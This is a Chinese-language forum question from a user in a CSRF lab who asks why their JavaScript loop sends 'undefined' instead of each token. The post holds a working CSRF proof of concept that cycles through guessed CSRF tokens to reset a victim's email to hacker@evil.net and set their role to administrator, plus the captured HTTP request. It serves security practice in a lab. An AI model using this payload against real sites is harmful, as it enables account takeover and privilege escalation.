JavaScript：在for循环中遍历数组吗？

我正在CSRF实验室工作，并尝试遍历20多个令牌。

<script>
    var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
    var arrayLength = token.length;
    for (var i = 0; i < arrayLength; i++) {
        function submitRequest() {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "https://csrf.labs/function.php", true);
            xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
            xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
            xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
            xhr.withCredentials = true;
            var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
                aBody[i] = body.charCodeAt(i);
            xhr.send(new Blob([aBody]));
        }
        submitRequest.call();
    };
</script>

我正在使用+token[i]+将令牌插入到csrf参数中，但是在Burp中查看请求，它似乎是“未定义”：

POST /function.php HTTP/1.1
Host: csrf.labs
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 89
Origin: null
DNT: 1
Connection: close
Cookie: PHPSESSID=[redacted]
Cache-Control: max-age=0

username=foo&email=hacker%40evil.net&status=administrator&csrf=undefined&submit=

我在这里怎么了？我还是JavaScript的新手，所以+token[i]+可能不是执行此操作的正确方法？